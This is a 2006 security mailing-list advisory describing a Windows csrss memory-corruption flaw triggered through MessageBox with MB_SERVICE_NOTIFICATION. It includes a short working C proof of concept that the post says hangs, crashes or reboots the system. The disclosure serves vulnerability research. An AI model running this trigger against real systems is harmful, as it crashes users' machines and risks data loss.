Computer Security
[EN] securityvulns.ru no-pyccku


Related information

  Microsoft Windows memory corruption

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From:3APA3A <3APA3A_(at)_security.nnov.ru>
Date:16.12.2006
Subject:Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear [email protected],

 On  one  of  Russian  forum  security  vulnerability  is  discussed in
 Microsoft Windows (Windows XP is tested). A vulnerability is caused by
 memory  corruption  is  string  beginning  with  "\?\" is send thorugh
 MessageBox  API  with MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug"  feature  not  cleaned  out  in  final release and it seems to
 exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots.
 

--
http://www.security.nnov.ru
        /\_/\
       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                   |/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod